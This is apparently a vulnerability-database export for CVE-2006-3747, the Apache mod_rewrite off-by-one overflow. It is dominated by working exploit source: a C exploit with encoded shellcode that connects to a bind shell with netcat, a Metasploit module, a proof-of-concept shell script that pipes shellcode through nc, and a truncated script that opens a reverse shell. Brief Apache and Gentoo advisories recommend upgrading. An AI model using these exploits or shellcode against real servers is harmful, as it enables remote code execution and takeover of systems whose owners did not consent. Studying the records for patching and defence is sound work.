\n\"\\x4f\\x55\\x64\\x4c\\x4f\\x6b\\x4f\\x66\\x35\\x43\\x34\\x50\\x59\\x6e\\x69\\x47\" \n\"\\x74\\x6c\\x4e\\x6a\\x42\\x58\\x72\\x54\\x6b\\x64\\x67\\x72\\x74\\x39\\x6f\\x76\" \n\"\\x57\\x6b\\x4f\\x50\\x55\\x44\\x70\\x30\\x31\\x4b\\x70\\x50\\x50\\x30\\x50\\x50\" \n\"\\x50\\x32\\x70\\x77\\x30\\x46\\x30\\x53\\x70\\x70\\x50\\x49\\x6f\\x63\\x65\\x66\" \n\"\\x4c\\x4b\\x39\\x4f\\x37\\x30\\x31\\x6b\\x6b\\x33\\x63\\x71\\x43\\x42\\x48\\x54\" \n\"\\x42\\x63\\x30\\x76\\x71\\x63\\x6c\\x4c\\x49\\x6d\\x30\\x52\\x4a\\x32\\x30\\x32\" \n\"\\x70\\x36\\x37\\x59\\x6f\\x52\\x75\\x71\\x34\\x50\\x53\\x70\\x57\\x4b\\x4f\\x72\" 
\n\"\\x75\\x44\\x68\\x61\\x43\\x62\\x74\\x33\\x67\\x59\\x6f\\x63\\x65\\x67\\x50\\x4c\" \n\"\\x49\\x38\\x47\\x6d\\x51\\x5a\\x4c\\x53\\x30\\x36\\x70\\x53\\x30\\x33\\x30\\x4e\" \n\"\\x69\\x4b\\x53\\x53\\x5a\\x43\\x30\\x72\\x48\\x53\\x30\\x34\\x50\\x33\\x30\\x33\" \n\"\\x30\\x50\\x53\\x76\\x37\\x6b\\x4f\\x36\\x35\\x74\\x58\\x6e\\x61\\x4a\\x4c\\x67\" \n\"\\x70\\x35\\x54\\x33\\x30\\x63\\x30\\x49\\x6f\\x78\\x53\\x41\"; \n \n \nchar finish[]= \"HTTP/1.0\\r\\nHost: \"; \n \nchar payload2[]= \n\"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x18\" \n\"\\xd9\\x03\\x3a\\x83\\xeb\\xfc\\xe2\\xf4\\xe4\\xb3\\xe8\\x77\\xf0\\x20\\xfc\\xc5\" \n\"\\xe7\\xb9\\x88\\x56\\x3c\\xfd\\x88\\x7f\\x24\\x52\\x7f\\x3f\\x60\\xd8\\xec\\xb1\" \n\"\\x57\\xc1\\x88\\x65\\x38\\xd8\\xe8\\x73\\x93\\xed\\x88\\x3b\\xf6\\xe8\\xc3\\xa3\" \n\"\\xb4\\x5d\\xc3\\x4e\\x1f\\x18\\xc9\\x37\\x19\\x1b\\xe8\\xce\\x23\\x8d\\x27\\x12\" \n\"\\x6d\\x3c\\x88\\x65\\x3c\\xd8\\xe8\\x5c\\x93\\xd5\\x48\\xb1\\x47\\xc5\\x02\\xd1\" \n\"\\x1b\\xf5\\x88\\xb3\\x74\\xfd\\x1f\\x5b\\xdb\\xe8\\xd8\\x5e\\x93\\x9a\\x33\\xb1\" \n\"\\x58\\xd5\\x88\\x4a\\x04\\x74\\x88\\x7a\\x10\\x87\\x6b\\xb4\\x56\\xd7\\xef\\x6a\" \n\"\\xe7\\x0f\\x65\\x69\\x7e\\xb1\\x30\\x08\\x70\\xae\\x70\\x08\\x47\\x8d\\xfc\\xea\" \n\"\\x70\\x12\\xee\\xc6\\x23\\x89\\xfc\\xec\\x47\\x50\\xe6\\x5c\\x99\\x34\\x0b\\x38\" \n\"\\x4d\\xb3\\x01\\xc5\\xc8\\xb1\\xda\\x33\\xed\\x74\\x54\\xc5\\xce\\x8a\\x50\\x69\" \n\"\\x4b\\x8a\\x40\\x69\\x5b\\x8a\\xfc\\xea\\x7e\\xb1\\x12\\x67\\x7e\\x8a\\x8a\\xdb\" \n\"\\x8d\\xb1\\xa7\\x20\\x68\\x1e\\x54\\xc5\\xce\\xb3\\x13\\x6b\\x4d\\x26\\xd3\\x52\" \n\"\\xbc\\x74\\x2d\\xd3\\x4f\\x26\\xd5\\x69\\x4d\\x26\\xd3\\x52\\xfd\\x90\\x85\\x73\" \n\"\\x4f\\x26\\xd5\\x6a\\x4c\\x8d\\x56\\xc5\\xc8\\x4a\\x6b\\xdd\\x61\\x1f\\x7a\\x6d\" \n\"\\xe7\\x0f\\x56\\xc5\\xc8\\xbf\\x69\\x5e\\x7e\\xb1\\x60\\x57\\x91\\x3c\\x69\\x6a\" \n\"\\x41\\xf0\\xcf\\xb3\\xff\\xb3\\x47\\xb3\\xfa\\xe8\\xc3\\xc9\\xb2\\x27\\x41\\x17\" 
\n\"\\xe6\\x9b\\x2f\\xa9\\x95\\xa3\\x3b\\x91\\xb3\\x72\\x6b\\x48\\xe6\\x6a\\x15\\xc5\" \n\"\\x6d\\x9d\\xfc\\xec\\x43\\x8e\\x51\\x6b\\x49\\x88\\x69\\x3b\\x49\\x88\\x56\\x6b\" \n\"\\xe7\\x09\\x6b\\x97\\xc1\\xdc\\xcd\\x69\\xe7\\x0f\\x69\\xc5\\xe7\\xee\\xfc\\xea\" \n\"\\x93\\x8e\\xff\\xb9\\xdc\\xbd\\xfc\\xec\\x4a\\x26\\xd3\\x52\\xe8\\x53\\x07\\x65\" \n\"\\x4b\\x26\\xd5\\xc5\\xc8\\xd9\\x03\\x3a\"; \n \nint main(int argc, char *argv[]) \n{ \nint sockfd, numbytes; \nchar buf[MAXDATASIZE]; \nstruct hostent *he; \nstruct sockaddr_in their_addr; \nprintf(\" Exploit: apache mod rewrite exploit (win32)\\n\" \n\" By: fabio/b0x (oc-192, old CoTS member)\\n\" \n\"Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\\n\" \n); \nif (argc != 3) { \nprintf(\" Usage: ./apache hostname rewrite_path\\n\"); \nexit(1); \n} \nprintf(\"\\n[+]Preparing payload\\n\"); \n \nchar payload[748]; \nsprintf(payload,\"GET /%s%s%s%s%s\\r\\n\\r\\n\\0\",argv[2],get,shellcode,finish,argv[1]); \n \nprintf(\"[+]Connecting...\\n\"); \nif ((he=gethostbyname(argv[1])) == NULL) { \nprintf(\"[-]Cannot resolv hostname...\\n\"); \nexit(1); \n} \nif ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) { \nprintf(\"[-]Socket error...\\n\"); \nexit(1); \n} \n \ntheir_addr.sin_family = AF_INET; \ntheir_addr.sin_port = htons(PORT); \ntheir_addr.sin_addr = *((struct in_addr *)he->h_addr); \nmemset(their_addr.sin_zero, '\\0', sizeof their_addr.sin_zero); \nif (connect(sockfd, (struct sockaddr *)&their_addr, \nsizeof(struct sockaddr)) == -1) { \nprintf(\"[-]Unable to connect\\n\"); \nexit(1); \n} \nprintf(\"[+]Connected\\n[+]Sending...\\n\"); \nif (send(sockfd, payload, strlen(payload), 0) == -1){ \nprintf(\"[-]Unable to send\\n\"); \nexit(1); \n} \nprintf(\"[+]Sent\\n\"); \nclose(sockfd); \nprintf(\"[+]Starting second stage...\\n\"); \nsleep(3); \nprintf(\"[+]Connecting...\\n\"); \nif ((he=gethostbyname(argv[1])) == NULL) { \nprintf(\"[-]Cannot resolv 
hostname...\\n\"); \nexit(1); \n} \nif ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) { \nprintf(\"[-]Socket error...\\n\"); \nexit(1); \n} \n \ntheir_addr.sin_family = AF_INET; \ntheir_addr.sin_port = htons(PORT2); \ntheir_addr.sin_addr = *((struct in_addr *)he->h_addr); \nmemset(their_addr.sin_zero, '\\0', sizeof their_addr.sin_zero); \nif (connect(sockfd, (struct sockaddr *)&their_addr, \nsizeof(struct sockaddr)) == -1) { \nprintf(\"[-]Unable to connect\\n\"); \nexit(1); \n} \nprintf(\"[+]Connected\\n[+]Sending...\\n\"); \nif (send(sockfd, payload2, strlen(payload2), 0) == -1){ \nprintf(\"[-]Unable to send\\n\"); \nexit(1); \n} \nprintf(\"[+]Sent\\n[+]Connecting to shell\\n\"); \nclose(sockfd); \n \n \nsleep(3); \nint exec; \nchar what[1024]; \nsprintf(what,\" nc -w 10 %s 4445\",argv[1]); \nexec=system(what); \nif (exec!=0){ \nprintf(\"[-]Not hacked\\n\"); \n} else { \nprintf(\"[+]Owned\\n\"); \n} \nexit(1); \n} \n \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/56989/apache2058-rewrite.txt"}, {"lastseen": "2016-12-05T22:20:00", "description": "", "published": "2008-01-07T00:00:00", "type": "packetstorm", "title": "apache-mod-rewrite.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2008-01-07T00:00:00", "id": "PACKETSTORM:62377", "href": "https://packetstormsecurity.com/files/62377/apache-mod-rewrite.rb.txt.html", "sourceData": "`require 'msf/core' \n \nmodule Msf \n \nclass Exploits::Windows::Http::Apache_mod_rewrite < Msf::Exploit::Remote \n \ninclude Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Mod_Rewrite escape_absolute_uri() Off-By-One Buffer Overflow', \n'Description' => %q{ \nThis module exploits a off-by-one buffer overflow. RewriteRule must be enabled and rule must meets this criteria: \n* beginning of the rewritten URL is controlled. 
\n* flags on the rule do not include the Forbidden (F), Gone (G), or NoEscape (NE) flag \n}, \n'Author' => [ 'Marcin Kozlowski' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 0001 $', \n'References' => \n[ \n['CVE', '2006-3747'], \n['BID', '19204'], \n['OSVDB', '27588'], \n \n], \n'Privileged' => false, \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n'EncoderType' => Msf::Encoder::Type::AlphanumMixed, \n'DisableNops' => true, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['Apache 1.3 branch (>1.3.28 and <1.3.37), Apache 2.0 branch (2.0.46 and <2.0.59), Apache 2.2 branch (>2.2.0 and <2.2.3)', {'Ret' => 0x90909090 }], # our ret is NOP, since our shellcode is shortly after and will be execute next \n], \n'DisclosureDate' => 'Aug 28 2006')) \n \nregister_options( \n[ \nOptString.new('REWRITEPATH', [true, \"Rewrite path\"]), \nOpt::RPORT(80) \n], self.class ) \nend \n \ndef exploit \nconnect \n \nrewritepath = datastore['REWRITEPATH'] \n \n \nuri = \"/#{rewritepath}/ldap://\"+rand_text_alphanumeric(rand(16))+\"/\"+rand_text_alphanumeric(rand(32))+\"%3f\"+rand_text_alphanumeric(rand(8))+\"%3f\"+rand_text_alphanumeric(rand(8))+\"%3f\"+rand_text_alphanumeric(rand(16))+\"%3f\"+rand_text_alphanumeric(rand(8))+\"%3f%90\" \nuri += payload.encoded \n \n \nres = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\" \nprint_status(\"Trying ...\") \nsock.put(res) \nsock.close \n \nhandler \ndisconnect \nend \n \n \n \nend \nend \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/62377/apache-mod-rewrite.rb.txt"}, {"lastseen": "2016-12-05T22:14:41", "description": "", "published": "2006-08-27T00:00:00", "type": "packetstorm", "title": "modrewritepoc.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2006-08-27T00:00:00", "id": "PACKETSTORM:49400", "href": "https://packetstormsecurity.com/files/49400/modrewritepoc.txt.html", "sourceData": "` 
\nPublic release date of POC/Exploit: 2006-08-20 \nAuthor: Jacobo Avariento Gimeno \nCVE id: CVE-2006-3747 \nBugtraq id: 19204 \nCERT advisory: VU#395412 \nSeverity: high \n \n \nIntroduction \n---- \nOn July 28 2006 Mark Dowd (McAfee Avert Labs) reported a vulnerability \nfound in the mod_rewrite Apache module to the bugtraq mailing list. \nThe vulnerable function is escape_absolute_uri() and the problem can \nonly arise when mod_rewrite is dealing with an LDAP URL: a \nmalformed LDAP URL could trigger an off-by-one overflow in certain \n(special) situations, and an attacker could cause a \ndenial-of-service or execute arbitrary code with the privileges of \nthe apache user. \nExploiting this vulnerability does not require an LDAP-specific rule, \nbut there must be a rule in which the user controls the initial part of the \nremapped URL, e.g.: \n \nRewriteRule foo/(.*) $1 \n \nAny version of the Apache HTTP server: \n* 1.3 branch: >1.3.28 and <1.3.37 \n* 2.0 branch: >2.0.46 and <2.0.59 \n* 2.2 branch: >2.2.0 and <2.2.3 \nis vulnerable. \n \n \nAnalysis of the vulnerable code \n---- \n \n2696 /* escape absolute uri, which may or may not be path oriented. \n2697 * So let's handle them differently. \n2698 */ \n2699 static char *escape_absolute_uri(ap_pool *p, char *uri, \nunsigned scheme) \n2700 { \n2701 char *cp; \n2702 ... \n... \n2727 /* special thing for ldap. \n2728 * The parts are separated by question marks. From RFC 2255: \n2729 * ldapurl = scheme \"://\" [hostport] [\"/\" \n2730 * [dn [\"?\" [attributes] [\"?\" [scope] \n2731 * [\"?\" [filter] [\"?\" extensions]]]]]] \n2732 */ \n2733 if (!strncasecmp(uri, \"ldap\", 4)) { \n2734 char *token[5]; \n2735 int c = 0; \n2736 \n2737 token[0] = cp = ap_pstrdup(p, cp); \n2738 while (*cp && c < 5) { \n2739 if (*cp == '?') { \n2740 token[++c] = cp + 1; \n2741 *cp = '\\0'; \n2742 } \n2743 ++cp; \n2744 } \n \nIn the case that an LDAP URI contains a fifth '?' 
the line 2740 causes \nan off-by-one overflow, it's writing in token[5]. \nTo exploit this problem is necessary a vulnerable apache version and a \nspecific stack frame layout. \n \nProof of concept \n---- \n \nTo know if your apache vulnerable version could be successful \nexploited, write this rule in your httpd.conf or .htaccess file: \n \nRewriteRule kung/(.*) $1 \n \nAnd try to access to the following URL: \n/kung/ldap://localhost/AAAAAAAAAAAAAAAAAAAAA%3FAAAAAAAAAAAAA% \n3FAAAAAAAAAAAAAAA%3FAAAAAAAAAA%3FAAAAAAAAAA%3FBBBBBBBBBBBBBB \n \nIf your web server doesn't reply you with a '302 Found' page or a \nSegmentation Fault appears in your error_log, an apache child has \ncrashed and your web server is vulnerable and exploitable. \n \nExploit \n---- \n \nThis exploit was successful executed on Apache 1.3.34, debian \nsarge package: \n \n#!/bin/sh \n# Exploit for Apache mod_rewrite off-by-one. \n# Vulnerability discovered by Mark Dowd. \n# CVE-2006-3747 \n# \n# by jack <jack\\x40gulcas\\x2Eorg> \n# 2006-08-20 \n# \n# Thx to xuso for help me with the shellcode. \n# \n# I suppose that you've the \"RewriteRule kung/(.*) $1\" rule if not \n# you must recalculate adressess. \n# \n# Shellcode is based on Taeho Oh bindshell on port 30464 and modified \n# for avoiding apache url-escape.. Take a look is quite nice ;) \n# \n# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at \n# 0x0834ae77 for any other version/system find it. 
\n# \n# Gulcas rulez :P \n \necho -e \"mod_rewrite apache off-by-one overflow\\nby jack <jack\\x40gulcas \n\\x2eorg>\\n\\n\" \n \nif [ $# -ne 1 ] ; then \necho \"Usage: $0 webserver\" \nexit \nfi \n \nhost=$1 \n \necho -ne \"GET /kung/ldap://localhost/`perl -e 'print \"%90\"x128'`%89%e6% \n31%c0%31 %db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3% \n01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04% \n31%c0%89%46%10%b0%10%89%46%08% b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66% \nb3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31% \nc9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8% \n23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76% \n08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db% \ncd %80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC% \n77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\\r\\nHost: \n$host\\r\\n\\r\\n\" | nc $host 80 \n \n \nMore info is coming at http://ciberjacobo.com/sec/mod_rewrite.html \n \n \n-- \nJacobo Avariento Gimeno \nhttp://ciberjacobo.com \nOpenPGP key: http://ciberjacobo.com/key.pem \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/49400/modrewritepoc.txt"}], "httpd": [{"lastseen": "2020-12-24T14:26:52", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "description": "\n\nAn off-by-one flaw exists in the Rewrite module, mod_rewrite.\nDepending on the manner in which Apache httpd was compiled, this\nsoftware defect may result in a vulnerability which, in combination\nwith certain types of Rewrite rules in the web server configuration\nfiles, could be triggered remotely. 
For vulnerable builds, the nature\nof the vulnerability can be denial of service (crashing of web server\nprocesses) or potentially allow arbitrary code execution.\n\n", "edition": 5, "modified": "2006-07-27T00:00:00", "published": "2006-07-21T00:00:00", "id": "HTTPD:926B81EFA0651C6A6A14D204526A10AC", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_rewrite off-by-one error", "type": "httpd", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "description": "\n\nAn off-by-one flaw exists in the Rewrite module, mod_rewrite.\nDepending on the manner in which Apache httpd was compiled, this\nsoftware defect may result in a vulnerability which, in combination\nwith certain types of Rewrite rules in the web server configuration\nfiles, could be triggered remotely. For vulnerable builds, the nature\nof the vulnerability can be denial of service (crashing of web server\nprocesses) or potentially allow arbitrary code execution.\n\n", "edition": 1, "modified": "2006-07-27T00:00:00", "published": "2006-07-21T00:00:00", "id": "HTTPD:6C9DAB876E616F2E0DD054F6CAEC074D", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.0.59: mod_rewrite off-by-one error", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "description": "\n\nAn off-by-one flaw exists in the Rewrite module, mod_rewrite.\nDepending on the manner in which Apache httpd was compiled, this\nsoftware defect may result in a vulnerability which, in combination\nwith certain types of Rewrite rules in the web server configuration\nfiles, could be triggered remotely. 
For vulnerable builds, the nature\nof the vulnerability can be denial of service (crashing of web server\nprocesses) or potentially allow arbitrary code execution.\n\n", "edition": 1, "modified": "2006-07-27T00:00:00", "published": "2006-07-21T00:00:00", "id": "HTTPD:72F2F52813642A1A16F01F74291257B4", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 1.3.37: mod_rewrite off-by-one error", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "description": "\n\nAn off-by-one flaw exists in the Rewrite module, mod_rewrite.\nDepending on the manner in which Apache httpd was compiled, this\nsoftware defect may result in a vulnerability which, in combination\nwith certain types of Rewrite rules in the web server configuration\nfiles, could be triggered remotely. For vulnerable builds, the nature\nof the vulnerability can be denial of service (crashing of web server\nprocesses) or potentially allow arbitrary code execution.\n\n", "edition": 1, "modified": "2006-07-27T00:00:00", "published": "2006-07-21T00:00:00", "id": "HTTPD:0D1550F3E416AE3560367A9812052A33", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.2.3: mod_rewrite off-by-one error", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:05", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747"], "description": "### Background\n\nThe Apache HTTP server is one of the most popular web servers on the Internet. The Apache module mod_rewrite provides a rule-based engine to rewrite requested URLs on the fly. \n\n### Description\n\nAn off-by-one flaw has been found in Apache's mod_rewrite module by Mark Dowd of McAfee Avert Labs. 
This flaw is exploitable depending on the types of rewrite rules being used. \n\n### Impact\n\nA remote attacker could exploit the flaw to cause a Denial of Service or execution of arbitrary code. Note that Gentoo Linux is not vulnerable in the default configuration. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Apache users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose www-servers/apache", "edition": 1, "modified": "2007-12-30T00:00:00", "published": "2006-08-01T00:00:00", "id": "GLSA-200608-01", "href": "https://security.gentoo.org/glsa/200608-01", "type": "gentoo", "title": "Apache: Off-by-one flaw in mod_rewrite", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-08-19T23:30:54", "description": "This module exploits the mod_rewrite LDAP protocol scheme handling flaw discovered by Mark Dowd, which produces an off-by-one overflow. Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable. This module requires REWRITEPATH to be set accurately. In addition, the target must have 'RewriteEngine on' configured, with a specific 'RewriteRule' condition enabled to allow for exploitation. 
The flaw affects multiple platforms, however this module currently only supports Windows based installations.\n", "published": "2009-03-10T06:42:11", "type": "metasploit", "title": "Apache Module mod_rewrite LDAP Protocol Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2017-11-08T16:00:24", "id": "MSF:EXPLOIT/WINDOWS/HTTP/APACHE_MOD_REWRITE_LDAP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Module mod_rewrite LDAP Protocol Buffer Overflow',\n 'Description' => %q{\n This module exploits the mod_rewrite LDAP protocol scheme handling\n flaw discovered by Mark Dowd, which produces an off-by-one overflow.\n Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.\n This module requires REWRITEPATH to be set accurately. 
In addition,\n the target must have 'RewriteEngine on' configured, with a specific\n 'RewriteRule' condition enabled to allow for exploitation.\n\n The flaw affects multiple platforms, however this module currently\n only supports Windows based installations.\n },\n 'Author' => 'aushack',\n 'References' =>\n [\n [ 'CVE', '2006-3747' ],\n [ 'OSVDB', '27588' ],\n [ 'BID', '19204' ],\n [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],\n [ 'EDB', '3680' ],\n [ 'EDB', '3996' ],\n [ 'EDB', '2237' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'AllowWin32SEH' => true\n },\n 'Privileged' => true,\n 'Platform' => ['win'],\n 'Payload' =>\n {\n 'Space' => 636,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\n 'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\n 'StackAdjustment' => -3500,\n 'DisableNops' => 'True',\n },\n 'Targets' =>\n [\n [ 'Automatic', {} ], # aushack tested OK 20090310 win32\n ],\n 'DisclosureDate' => 'Jul 28 2006',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('REWRITEPATH', [true, \"The mod_rewrite URI path\", \"rewrite_path\"]),\n ])\n end\n\n\n def check\n res = send_request_raw({\n 'uri' => '/',\n 'version' => '1.1',\n }, 2)\n\n if (res.to_s =~ /Apache/) # This could be smarter.\n return Exploit::CheckCode::Detected\n end\n return Exploit::CheckCode::Safe\n\n end\n\n def exploit\n\n # On Linux Apache, it is possible to overwrite EIP by\n # sending ldap://<buf> ... 
TODO aushack\n\n trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'\n\n print_status(\"Sending payload.\")\n send_request_raw({\n 'uri' => normalize_uri(datastore['REWRITEPATH']) + trigger + payload.encoded,\n 'version' => '1.0',\n }, 2)\n handler\n end\nend\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/apache_mod_rewrite_ldap.rb"}], "exploitdb": [{"lastseen": "2016-01-31T19:03:48", "description": "Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32). CVE-2006-3747. Remote exploit for windows platform", "published": "2007-04-07T00:00:00", "type": "exploitdb", "title": "Apache Mod_Rewrite Off-by-one Remote Overflow Exploit Win32", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2007-04-07T00:00:00", "id": "EDB-ID:3680", "href": "https://www.exploit-db.com/exploits/3680/", "sourceData": "#!/bin/sh\r\n# Exploit for Apache mod_rewrite off-by-one(Win32).\r\n#\r\n# by axis <axis@ph4nt0m>\r\n# http://www.ph4nt0m.org\r\n# 2007-04-06\r\n#\r\n# Tested on Apache 2.0.58 (Win32)\r\n# Windows2003 CN SP1\r\n#\r\n# Vulnerable Apache Versions:\r\n# * 1.3 branch: >1.3.28 and <1.3.37\r\n# * 2.0 branch: >2.0.46 and <2.0.59\r\n# * 2.2 branch: >2.2.0 and <2.2.3\r\n#\r\n#\r\n# Vulnerability discovered by Mark Dowd.\r\n# CVE-2006-3747\r\n# \r\n# first POC by jack <jack\\x40gulcas\\x2Eorg>\r\n# 2006-08-20\r\n# http://www.milw0rm.com/exploits/2237\r\n#\r\n#\r\n# \r\n# to successfully exploit the vuln,there are some conditions\r\n# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html\r\n# \r\n# \r\n# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat\r\n# \r\n# for more details about the vuln please see:\r\n# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded\r\n# \r\n# \r\n# no opcodes needed under windows!\r\n# it will directly run our 
shellcode\r\n# \r\n# my apache config file\r\n# [httpd.conf]:\r\n# RewriteEngine on\r\n# RewriteRule 1/(.*) $1\r\n# RewriteLog \"logs/rewrite.log\"\r\n# RewriteLogLevel 3\r\n# \r\n# \r\n# Usage:\r\n# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141\r\n# mod_rewrite apache off-by-one overflow\r\n# \r\n# [axis@opensystemX axis]$ nc -vv -n -l -p 1154\r\n# listening on [any] 1154 ...\r\n# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077\r\n# Microsoft Windows [\u00a1\u00e3?\u00a1\u00c0? 5.2.3790]\r\n# (C) \u00a1\u00e3?\u00a8\u00a8\u00a1\u00a7?\u00a8\u00b4\u00a8\u00aeD 1985-2003 Microsoft Corp.\r\n# \r\n# D:\\Apache\\Apache2>exit\r\n# exit\r\n# sent 5, rcvd 100\r\n# \r\n# \r\n# \r\n# shellcode \u00b5\u00c4badchar\u00a3\u00ac\u00ce\u00d2\u00d5\u00e2\u00c0\u00ef\u00d3\u00c3\u00b5\u00c4\u00a3\u00ac\u00c6\u00e4\u00ca\u00b5\u00b2\u00bb\u00d0\u00e8\u00d2\u00aa\u00c4\u00c7\u00c3\u00b4\u00b6\u00e0\r\n# \u00ce\u00d2\u00b8\u00fa\u00b5\u00bd\u00c1\u00bd\u00b8\u00f6badchar\u00ca\u00c7 0x3f\u00ba\u00cd 0x0b \u00c6\u00e4\u00cb\u00fb\u00b6\u00bc\u00ca\u00c7\u00d2\u00d4\u00c7\u00b0\u00c9\u00fa\u00b3\u00c9shellcode\u00cf\u00b0\u00b9\u00df\u00d0\u00d4\u00b1\u00a3\u00c1\u00f4\u00b5\u00c4\r\n# 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b\r\n#\r\n\r\n\r\necho -e \"mod_rewrite apache off-by-one overflow\"\r\n\r\n\r\nif [ $# -ne 1 ] ; then\r\n echo \"Usage: $0 webserver\"\r\n exit\r\nfi\r\n\r\nhost=$1\r\n\r\n#use ldap:// to trigger the vuln, \"Ph4nt0m\" is any arbitrary string\r\necho -ne \"GET /1/ldap://ph4nt0m/`perl -e 'print \"Ph4nt0m\"x5'`\\ \r\n# %3f to trigger the vuln\r\n%3fA%3fA%3f\\ \r\n#string \"CCCC..\" is any arbitrary string, use %3f to trigger the vuln\r\n#%90 is the machine code we will jmp to(NOP),run shellcode from here\r\n`perl -e 'print \"C\"x10'`%3fC%3f%90\\ \r\n# shellcode,reverse shell to 192.168.0.1 ,port 1154 alpha2 encoded\r\n`perl -e 'print \"\\ 
